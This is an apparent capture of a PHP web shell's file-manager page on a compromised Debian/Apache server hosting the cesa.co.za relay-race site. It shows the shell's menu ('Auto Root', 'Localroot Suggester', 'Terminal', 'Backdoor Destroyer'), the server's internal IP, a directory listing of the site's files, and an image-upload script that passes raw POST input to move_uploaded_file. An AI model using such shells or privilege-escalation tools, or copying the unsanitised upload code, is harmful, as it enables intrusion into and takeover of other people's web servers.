Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
relay /
Delete
Unzip
Name
Size
Permission
Date
Action
Elements
[ DIR ]
drwxr-sr-x
2014-07-04 12:09
Scripts
[ DIR ]
drwxr-sr-x
2014-07-04 12:14
css
[ DIR ]
drwxr-sr-x
2014-07-04 12:06
fckeditor
[ DIR ]
drwxr-sr-x
2014-07-04 12:12
images
[ DIR ]
drwxrwsr-x
2020-06-06 16:04
img
[ DIR ]
drwxr-sr-x
2019-07-18 14:37
include
[ DIR ]
drwxr-sr-x
2020-06-06 16:06
js
[ DIR ]
drwxr-sr-x
2014-07-04 12:14
thumbs
[ DIR ]
drwxr-sr-x
2014-07-04 12:10
08_29_2011_CESA_Relay_2011_Offcial_Results.xls
183.5
KB
-rw-r--r--
2014-07-04 12:06
09_03_2012_Summary_Results_CESA_Relay_20120825.xlsx
78.13
KB
-rw-r--r--
2014-07-04 12:06
10km Cycle Route.pdf
222.98
KB
-rw-r--r--
2016-08-29 08:38
2009RelayPrizeWinners.zip
22.49
KB
-rw-r--r--
2014-07-04 12:06
2009RelayResults.zip
79.71
KB
-rw-r--r--
2014-07-04 12:07
5km Run Route.pdf
220.07
KB
-rw-r--r--
2016-08-29 08:38
Binder1.pdf
1.64
MB
-rw-r--r--
2014-08-19 08:47
CESA 2018 Cycle Route.pdf
1.03
MB
-rw-r--r--
2018-08-26 10:29
CESA 2018 Run Route.pdf
965.48
KB
-rw-r--r--
2018-08-26 10:29
CESA Relay Map.pdf
440.13
KB
-rw-r--r--
2014-08-20 09:07
CESA Relay.docx
855.17
KB
-rw-r--r--
2014-07-03 09:45
CESA Venue Layout.pdf
408.39
KB
-rw-r--r--
2014-08-20 09:08
CESA2018Results.pdf
19.62
KB
-rw-r--r--
2018-09-26 09:59
CESA_Relay_Order_Form.xls
57.5
KB
-rw-r--r--
2016-07-27 13:49
CESA_Relay_Order_Form.xlsx
28.42
KB
-rw-r--r--
2016-07-20 08:24
CESA_relay_results.xls
214.5
KB
-rw-r--r--
2014-07-04 12:07
Cycling Route.pdf
998.8
KB
-rw-r--r--
2017-08-23 08:23
Kyalami Country Club - Platter list.doc
24.5
KB
-rw-r--r--
2016-08-02 08:15
Relay_2008_Results.zip
56.99
KB
-rw-r--r--
2014-07-04 12:09
Relay_2008_Results_CSV.zip
22.05
KB
-rw-r--r--
2014-07-04 12:09
Running Route.pdf
936.87
KB
-rw-r--r--
2017-08-23 08:23
Summary_Results_CESA_Relay_2013.pdf
141.26
KB
-rw-r--r--
2014-07-04 12:09
add.php
9.44
KB
-rw-r--r--
2014-07-04 12:07
addimg.php
994
B
-rw-r--r--
2014-07-04 12:07
addimgck.php
2.83
KB
-rw-r--r--
2014-07-04 12:07
comp_cyc.php
2.84
KB
-rw-r--r--
2014-07-04 12:07
error_log
11.04
KB
-rw-r--r--
2014-07-04 12:09
gallery.php
2.79
KB
-rw-r--r--
2017-09-27 09:06
index.php
4.79
KB
-rw-r--r--
2020-02-12 09:53
kcc_drinks_order.pdf
108.71
KB
-rw-r--r--
2016-08-12 12:08
mailer.html
2.35
KB
-rw-r--r--
2016-06-22 09:15
mailer2.html
2.53
KB
-rw-r--r--
2016-08-24 08:45
mailer3.html
3.18
KB
-rw-r--r--
2016-08-24 08:50
readme.txt
241
B
-rw-r--r--
2014-07-04 12:09
screen.css
2.96
KB
-rw-r--r--
2016-06-22 08:10
Save
Rename
<?php //*************************************** // This is downloaded from www.plus2net.com // /// You can distribute this code with the link to www.plus2net.com /// // Please don't remove the link to www.plus2net.com /// // This is for your learning only not for commercial use. /////// //The author is not responsible for any type of loss or problem or damage on using this script.// /// You can use it at your own risk. ///// //***************************************** ?> <!doctype html public "-//w3c//dtd html 3.2//en"> <html> <head> <title>Multiple image upload script from plus2net.com</title> <meta name="GENERATOR" content="Arachnophilia 4.0"> <meta name="FORMATTER" content="Arachnophilia 4.0"> </head> <body > <?php $userFile = $_POST['userfile']; move_uploaded_file($userFile,'upimg/'.$userFile); //move_uploaded_file($userFile,'upimg/'.$userFile); ?> <?php /* $add="upimg/$userfile_name"; // the path with the file name where the file will be stored, upload is the directory name. if(move_uploaded_file ($userfile, $add)){ echo "Successfully uploaded the mage"; chmod("$add",0777); }else{echo "Failed to upload file Contact Site admin to fix the problem"; exit;} ///////// Start the thumbnail generation////////////// $n_width=100; // Fix the width of the thumb nail images $n_height=100; // Fix the height of the thumb nail imaage $tsrc="thimg/$userfile_name"; // Path where thumb nail image will be stored echo $tsrc; if (!($userfile_type =="image/pjpeg" OR $userfile_type=="image/gif")){echo "Your uploaded file must be of JPG or GIF. Other file types are not allowed<BR>"; exit;} /////////////////////////////////////////////// Starting of GIF thumb nail creation/////////// if (@$userfile_type=="image/gif") { $im=ImageCreateFromGIF($add); $width=ImageSx($im); // Original picture width is stored $height=ImageSy($im); // Original picture height is stored $newimage=imagecreatetruecolor($n_width,$n_height); imageCopyResized($newimage,$im,0,0,0,0,$n_width,$n_height,$width,$height); if (function_exists("imagegif")) { Header("Content-type: image/gif"); ImageGIF($newimage,$tsrc); } elseif (function_exists("imagejpeg")) { Header("Content-type: image/jpeg"); ImageJPEG($newimage,$tsrc); } chmod("$tsrc",0777); }////////// end of gif file thumb nail creation////////// ////////////// starting of JPG thumb nail creation////////// if($userfile_type=="image/pjpeg"){ $im=ImageCreateFromJPEG($add); $width=ImageSx($im); // Original picture width is stored $height=ImageSy($im); // Original picture height is stored $newimage=imagecreatetruecolor($n_width,$n_height); imageCopyResized($newimage,$im,0,0,0,0,$n_width,$n_height,$width,$height); ImageJpeg($newimage,$tsrc); chmod("$tsrc",0777); } //////////////// End of JPG thumb nail creation ////////// */?> </body> </html>